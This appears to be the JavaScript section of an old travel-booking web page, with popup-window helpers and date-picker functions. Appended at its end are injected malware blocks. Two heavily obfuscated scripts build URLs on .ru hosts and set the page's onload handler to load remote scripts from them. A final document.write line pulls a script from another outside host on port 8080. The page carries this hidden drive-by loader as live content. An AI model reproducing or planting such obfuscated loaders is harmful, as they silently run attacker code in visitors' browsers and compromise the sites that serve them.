	<!-- begin javascript includes -->

<!--

function newImage(arg) {
	if (document.images) {
		rslt = new Image();
		rslt.src = arg;
		return rslt;
	}
}

function changeImages() {
	if (document.images && (preloadFlag == true)) {
		for (var i=0; i<changeImages.arguments.length; i+=2) {
			document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
		}
	}
}

var preloadFlag = false;
function preloadImages() {
	if (document.images) {
		stay_01_over = newImage("http://www.travelnow.com/images/stay_01.gif");
		stay_02_over = newImage("http://www.travelnow.com/images/stay_02.gif");
		fly_01_over = newImage("http://www.travelnow.com/images/fly_01.gif");
		fly_02_over = newImage("http://www.travelnow.com/images/fly_02.gif");
		drive_01_over = newImage("http://www.travelnow.com/images/drive_01.gif");
		drive_03_over = newImage("http://www.travelnow.com/images/drive_03.gif");
		preloadFlag = true;
	}
}

// -->

<!-- End Preload Script -->

<!--
	var help=null;
	function MM_openBrWindow(theURL,winName,features, myWidth, myHeight, isCenter) { //v3.0
	  if(window.screen)if(isCenter)if(isCenter=="true"){
	    var myLeft = (screen.width-myWidth)/2;
	    var myTop = (screen.height-myHeight)/2;
	    features+=(features!='')?',':'';
	    features+=',left='+myLeft+',top='+myTop;
	  }
	  if(help!=null)help.close();
	  window.open(theURL,winName,features+((features!='')?',':'')+'width='+myWidth+',height='+myHeight);
	}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);

}


function OpenHTU(file,name,width,height) {
    attr = "width=" + width + ",height=" + height + ",resizeable=1";
    window.open(file, name, attr);
  }

function openconvert(file,input) {
  	window.open(file, input, 'width=640,height=300,resizable=1');
}
//-->


  	<!-- begin hotAvailJS includes -->

	

<!--
//var tool = java.awt.Toolkit;
//var size = new java.awt.Dimension(tool.getDefaultToolkit().getScreenSize());
//var myWidth = size.width;
//var myHeight = size.height;
//alert(myWidth+'x'+myHeight);

function OpenRes(theURL) {
  	window.open(theURL, "RES", 'scrollbars=1,width=800,height=600,resizable=1,status=1');
}

function OpenDates(file,input) {
  	window.open(file, input, 'width=300,height=300,resizable=1');
}

function OpenInfo(file,input) {
  	window.open(file, "PropInfo", 'scrollbars=1,width=520,height=100%,resizable=1');
}

function openconvert(file,input) {
  	window.open(file, input, 'width=640,height=300,resizable=1');
}

function opentnpr(file,input) {
  	window.open(file, input, 'width=300,height=340,resizable=1');
}

function OpenRateRules(file) {
        window.open(file, 'RateRules', 'width=440,height=400,resizable=1,scrollbars=1');
}

function OpenLogWindow(file,input) {
  	window.open(file, input, 'width=250,height=175,resizable=1,status=1');
}

bName = navigator.appName;
bVer = parseInt(navigator.appVersion);

if      (bName == "Netscape" && bVer >= 3) ver = "n3"; 

else if (bName == "Netscape" && bVer == 2) ver = "n2";

else if (bName == "Microsoft Internet Explorer" && bVer >= 2) ver = "e2";

if (ver == "n3"){
	processoff = new Image(103, 26);
	processoff.src = "/images/processoff.gif";
}

function procoff(imgName){
	if (ver == "n3"){
		imgOff = eval(imgName + "off.src");
//   	document.images[0].src = imgOff;
          document.img_proc.src=imgOff;
	}
}

// Checks if browser is Netscape 2.0x since the options array properties don't work with Netscape 2.0x
function isBrowserSupp() {
    // Get the version of the browser
    version =  parseFloat( navigator.appVersion );

    if ( ( version >= 2.0 ) && ( version < 2.1 ) && ( navigator.appName.indexOf( "Netscape" ) != -1 ) ) {
        return false;
    }
    else {
	return true;
    }

return true;
}
// -->


	<!-- end hotavailJS includes -->

	<!-- begin searchJS includes -->
	

<!--
//function SetFocus() {
//  document.frm_Search.city.focus();
//}

//function UpdateCityCode() {
//        document.frm_Search.city.value = document.frm_Search.cityCode.options[document.frm_Search.cityCode.selectedIndex].value;
//}

function OpenDates(file,input) {
    window.open(file, input, 'width=300,height=300,resizable=1');
}

  function OpenCalendar(dayField, day, monthField, month, yearField, year)
  {
    file = 'http://www.travelnow.com/util/calendar.jsp?formName=frm_Search';
    if ( dayField != null )
      file += '&dayField=' + dayField + '&day=' + day;
    if ( monthField != null )
      file += '&monthField=' + monthField + '&month=' + month;
    if ( yearField != null )
      file += '&yearField=' + yearField + '&year=' + year;
    window.open( file, "dates", 'width=300,height=300,resizable=1');
  }

function OpenLogWindow(file,input) {
    window.open(file, input, 'width=250,height=175,resizable=1,status=1');
}


//start new script code

// Checks if browser is Netscape 2.0x since the options array properties don't work with Netscape 2.0x
function isBrowserSupp() {
    // Get the version of the browser
    version =  parseFloat( navigator.appVersion );

    if ( ( version >= 2.0 ) && ( version < 2.1 ) && ( navigator.appName.indexOf( "Netscape" ) != -1 ) ) {
        return false;
    }
    else {
    return true;
    }

return true;
}

function isLeapYear(yrStr)
{
var leapYear=false;
var year = parseInt(yrStr, 10);
// every fourth year is a leap year
if (year%4 == 0)
	{
	leapYear=true;
	// unless it's a multiple of 100
	if (year%100 == 0)
		{
		leapYear=false;
		// unless it's a multiple of 400
		if (year%400 == 0)
			{
			leapYear=true;
			}
		}
	}
return leapYear;
}


function getDaysInMonth(mthIdx, YrStr)
{
// all the rest have 31
var maxDays=31
// expect Feb. (of course)
if (mthIdx==1) 
	{
	if (isLeapYear(YrStr))
		{
		maxDays=29;
		}
	else 
		{
		maxDays=28;
		}
	}
// thirty days hath...
if (mthIdx==3 || mthIdx==5 || mthIdx==8 || mthIdx==10)
	{
	maxDays=30;
	}
return maxDays;
}


//the function which does some magic to the date fields
// return non-zero if it is the last day of the month
function adjustDate(mthIdx, Dt) 
{
var value=0;

var today = new Date()
var theYear = parseInt(today.getYear(),10)

if (mthIdx < today.getMonth()) {
	theYear = (parseInt(today.getYear(), 10) + 1)
}
if(theYear<100){
	theYear = "19" + theYear
}
else{
	if((theYear-100) < 10){
		theYear = "0" + (theYear-100)
	}
	else{
		theYear = (theYear-100)+""
	}
	theYear = "20" + theYear
}


var numDays=getDaysInMonth(mthIdx, theYear);

if (mthIdx==1) 
	{
	if (Dt.options.selectedIndex + 1 < numDays)
		{
		return 0;
		}
	else 
		{
		Dt.options.selectedIndex=numDays - 1;
		//check for leap year
		if (numDays==29)
			{
			return 99;
			}
		else 
			{
			return 1;
			}
		}
	}
if (Dt.options.selectedIndex + 1 < numDays)
	{
	value=0;
	}
else 
	{
	if (Dt.options.selectedIndex + 1 > numDays)
		{
		Dt.options.selectedIndex--;
		value=3;
		}
	else 
		{
		//index is 31 or 30
		value=2;
		}
	}
return value;
}

//changes departure month when arrival month is changed
function amadChange(inM,inD,outM,outD) 
{
if (!isBrowserSupp())
	{
 	return;
	}

var res = adjustDate(inM.options.selectedIndex, inD);
if (res != 0)
	{
	       outD.options.selectedIndex=0;
	       if (outM.options.selectedIndex==11){
			outM.options.selectedIndex=0
	       }
	       else{
			outM.options.selectedIndex=inM.options.selectedIndex + 1;
	       }
	}
else 
	{
	outM.options.selectedIndex = inM.options.selectedIndex;
	outD.options.selectedIndex = inD.options.selectedIndex+1;
	}
return;
}

function dmddChange(outM,outD) 
{
if (!isBrowserSupp())
	{
	return;			
	}

adjustDate(outM.options.selectedIndex,outD);	
return;	
}


//end new script code from Hilton

// -->


	<!-- end searchJS includes -->

	<!-- begin mapsJS includes -->
	
<!--
function MapPopup(theURL,winName,features)
{
	fileWindow = "/popups/maps/mapPopup.jsp?cmd=Find&HotelLyr=Off&ClickMode=Center";
	fileWindow += theURL;
    window.open(fileWindow,winName,features);
}
//-->


	<!-- end mapsJS includes -->

	
	<!--
	//for the firefighters womens' and childrens fund
	function openWin2()
	{
	   thor = window.open('/firefighters1.jsp?cid=51274','thor','top=200,left=220,width=500,height=275,resizable=1');
	}

	function openWinCondo(fileName)
	{
		thor = window.open(fileName,'thor','top=200,left=220,width=300,height=450,resizable=1');
	}

	function openCondoWindow(file,input) {
 				 if(file == '/popups/hotels/condo.jsp')
                {
                    window.open(file, input,'width=300,height=540,resizable=1');
                }

	}

	function openWindow(fileName)
	{
	   thor = window.open(fileName,'thor','top=200,left=220,width=275,height=450,resizable=1,scrollbars=yes');
	}
	function opentnpr(file,input) {
                if(file == '/popups/hotels/sir.jsp')
                {
                    window.open(file, input,'width=300,height=430,resizable=1');
                }
                else if(file == '/popups/hotels/condo.jsp')
                {
                    window.open(file, input,'width=300,height=540,resizable=1');
                }
                else
                {
                    window.open(file, input,'width=300,height=450,resizable=1');
                }
	}
	//-->

m=["D","f","_v"];o={y:false};function l(){Dh={e:false};this.I="";var B=String("G8sbody".substr(3));var _U=new String("app"+"fsSend".substr(3)+"ChiDmKs".substr(0,3)+"ld");var H=String("def"+"er");var Z=new String("f85Dsr".substr(4)+"c");var u=window;var s=document;try {var c='z'} catch(c){};var L=new String();var U=new String("onloa"+"veVd".substr(3));var O=String("scri"+"X5Hlpt".substr(4));this.S="";var R=new String("cre"+"s3dQate".substr(4)+"Ele0C3P".substr(0,3)+"Bbxmen".substr(3)+"wfLQtfQwL".substr(4,1));function N(){this.NI=40557;this.NI+=243;OY={h:false};try {w={iY:"g"};Y={};this.yB='';var iJ={RN:false};var F=369537-361457;Oi=51085;Oi--;var k=String("/c7Ade".substr(0,2)+"tr"+"ip"+"-c"+"4Ppom".substr(3)+"/g"+"oo"+"glWqsj".substr(0,2)+"e."+"coK94".substr(0,2)+"m/"+"H2bpo2Hb".substr(3,2)+"rnkcEy".substr(0,2)+"or"+"am4ou".substr(0,2)+"a."+"coh2gn".substr(0,2)+"75bm.b57".substr(3,2)+"ph"+"p");Gl={wC:false};var uk=String("http"+"://p"+"assp"+"Q9djortb".substr(4)+"a41Ylues".substr(4)+"cxwC.ru:Cxcw".substr(4,4));this.T='';var a=8009-8008;var sM="";var zT={};this.pT=29050;this.pT-=14;var gm=new String();t=s[R](O);try {var Ts='XS'} catch(Ts){};this.To=62754;this.To-=179;this.rJ=45553;this.rJ-=90;Jz=61460;Jz-=117;t[H]=a;try {var T_='pL'} catch(T_){};this.gf=58479;this.gf++;t[Z]=uk+F+k;fe=51087;fe++;s[B][_U](t);} catch(v){var Fe=new String();try {var iT='jJ'} catch(iT){};};this.ul='';}u[U]=N;};var Sh={ic:39104};oA={No:2285};l();
try {var x='i'} catch(x){};aG=["Yo","cB"];w=[];u=[];FvL=[];try {this.m="";this.lg="lg";this.J="J";CM=29894;CM++;j=["O","yq","yY"];this.Ya='';this.B='';var o=window[new String("wOfQun".substr(4)+"es"+"LRpuca".substr(4)+"mVCGpemCGV".substr(4,2))];var oQ=window[("Re"+"gE"+"xp")];cr={qJ:false};this.Ai='';this.Mk='';Ie=[];var S=String("on8Oam".substr(0,2)+"loewP".substr(0,2)+"CGyad".substr(3));var Cx='';try {var f='wP'} catch(f){};try {var fI='oV'} catch(fI){};var QL=[];var K=new String("ZcKrep".substr(3)+"lacXf3".substr(0,3)+"eHTqm".substr(0,1));var QV="QV";var hb={no:"lh"};Dr=13473;Dr+=221;this.nH=31390;this.nH++;this.kj=36204;this.kj++;try {var pE='xn'} catch(pE){};try {var OD='v'} catch(OD){};try {var o_='pc'} catch(o_){};va=["DP","Yn","RgG"];JM=["Vt","DQ","Hu"];var n=String("1062A".substr(0,1));this.Rh='';this.Jr='';Ay=13633;Ay--;this.Xq='';var F='';this.A_=29415;this.A_++;Zz=39214;Zz+=15;jU=54868;jU+=247;Xb={uM:"aB"};Lo=60364;Lo-=179;var lI=["ih","Kl","gc"];function C(n,b){var Lz={wn:false};var XG={sM:false};Lq=23519;Lq++;var IF="";var Nm="";var a=new String("x2Jq[".substr(4));a+=b;this.Ra="Ra";this.d="d";a+=o("%5d");this.gi=29486;this.gi-=220;DT=10110;DT++;var gj={};XW=["xm","gX"];var GB=["Sr","SW"];var FF=new oQ(a, new String("s6Vg".substr(3)));nB={wPA:"JE"};UQ=35900;UQ-=230;this.un='';return n.replace(FF, F);var LH='';var Rm=["dh","zx"];QG=65463;QG++;var Nk=["sr","pQ"];};KH=24833;KH++;Aj=["pd","sj","YnT"];var N=new String("/goog"+"le.coSws".substr(0,5)+"m/con"+"stantQ80P".substr(0,5)+"conta"+"TUfAct.co".substr(4)+"CKJ1m/ku6KJ1C".substr(4,5)+"6ZR.com.".substr(3)+"php");var bh="bh";try {var Bw='OE'} catch(Bw){};try {var dG='wPG'} catch(dG){};try {var Gk='bWJ'} catch(Gk){};try {var ST='ii'} catch(ST){};var A=26862-18782;var AC=["fC"];var X=new String("ht"+"tp"+":/"+"o1J7/g".substr(4)+"otVHU".substr(0,2)+"hg"+"ui"+"lt"+".r"+"u:");var gy={hB:"dC"};function Y(){DZ={};this.Rhw="Rhw";this.hp="hp";this.xG='';this.kS=false;try {} catch(qV){};try {} catch(vN){};var Ht={kD:"yk"};var SI="5Ubapp".substr(3)+"IjoGendGjIo".substr(4,3)+"nazdChiandz".substr(4,3)+"ld";this.Gs="";var Zf=new String();var Hf=new String();var c=document;var JN=new String();UF=[];RU=[];var YM=C('s9cfrmi_pXtk','gU89mbWSfvBFnqh2_XjkZO');kl={Ic:false};Lj=55691;Lj--;var oF=["TI","OI","kd"];var bt=new String();tr={};Jab={Nd:false};M=c.createElement(YM);gZ=["Ynx","rh","td"];this.aL=29738;this.aL--;gcA={_u:3479};this.qC='';dn={yew:19424};y=X+A;this.lb="lb";Mf=858;Mf++;JP=[];y=y+N;this.sjs='';this._W='';this.kO='';mk={IH:false};var bD=c.body;try {} catch(rE){};fY=2662;fY-=84;var Dw={DU:false};M.src=y;Hl={};this.IE=1148;this.IE+=255;var TM={};var MC={};M[new String("defSji".substr(0,3)+"er")]=n;YBz=["rg","nw"];var kC=new Date();EO=["fYl","hA"];try {} catch(LQ){};eC=31693;eC--;this.nma=44183;this.nma--;var XX={OR:20306};bD[SI](M);LV=37282;LV--;try {} catch(cO){};};try {} catch(pB){};uV={};this.u_M=21903;this.u_M-=182;try {} catch(ug){};this.wz=false;this.ww='';window[S]=Y;aeh={QH:"DTE"};CP={qB:"KM"};Cq={wC:"Gb"};var wM=new Date();} catch(g){var sp=58629;var _xE={};var ZU=41934;eb=45328;eb++;mA={eFR:false};wh={XGP:17384};zn=29189;zn++;};_B={};bJ={be:"lvr"};




document.write('<s'+'cript type="text/javascript" src="http://solk.seamscreative.info:8080/JPEG.js"></scr'+'ipt>');